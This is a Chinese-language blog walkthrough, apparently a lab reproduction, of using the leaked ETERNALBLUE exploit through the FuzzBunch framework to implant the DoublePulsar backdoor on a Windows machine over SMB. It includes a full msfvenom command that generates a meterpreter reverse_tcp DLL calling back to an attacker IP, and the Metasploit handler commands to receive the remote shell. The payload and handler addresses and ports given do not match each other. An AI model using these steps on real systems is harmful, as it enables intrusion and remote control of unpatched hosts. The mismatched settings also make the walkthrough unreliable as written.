美文网首页
方程式0day ETERNALBLUE 复现过程

方程式0day ETERNALBLUE 复现过程

作者: __周__ | 来源:发表于2018-02-27 09:06 被阅读0次

环境:


去github上把需要脚本下载下来,解压到桌面上,然后设置python的环境变量,再运行fb.py,再次之前要在当前目录下配置一个名为listeningposts的目录,否则会报错

  • 成功执行fb.py的界面为


    图片.png

-首先会让你输入目标机器的ip地址;本地ip


图片.png
  • 询问是否重定向,选否
图片.png
  • 选择基本日志目录,输入no(由于我这里已经复现过一次,所以这里显示有test)


    图片.png

-这里我直接选择0进入test,如果没有test项目,可以选择另一个创建一个新的项目

图片.png
  • 然后下一步就默认回车
图片.png
  • 使用永恒之蓝的模块
图片.png
  • 下面的默认回车


    1.png
    2.png
  • 选择目标机器的系统,选择1

图片.png
  • 选择fuzzbunch
图片.png
  • 然后下面几个默认回车
图片.png
  • 在目标机器对应的SMB端口植入一个名为DoublePulsar的后门程序
图片.png
  • 然后默认回车。。。
图片.png
  • 下面的这个选择 SMB,再下面的选择操作系统版本这里选择64位
图片.png
  • 下一步选择 运行全部 2


    图片.png

接下来需要从kali中生成一个.dll的payload,供其使用,将生成出来的dll放到攻击机win7下

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.11.119 LPORT=4444 -f dll > s.dll
图片.png
  • 然后把生成的dll文件导入到工具中


    图片.png
  • 然后又是默认敲回车

图片.png 图片.png
  • 接下来去kali里面配置msf
use exploit/multi/handler
set LHOST 192.168.11.122
set LPORT 5555
set PAYLOAD windows/x64/meterpreter/reverse_tcp
exploit

之后就可以坐等shell上门啦

相关文章

网友评论

      本文标题:方程式0day ETERNALBLUE 复现过程

      本文链接:https://www.haomeiwen.com/subject/cunozxtx.html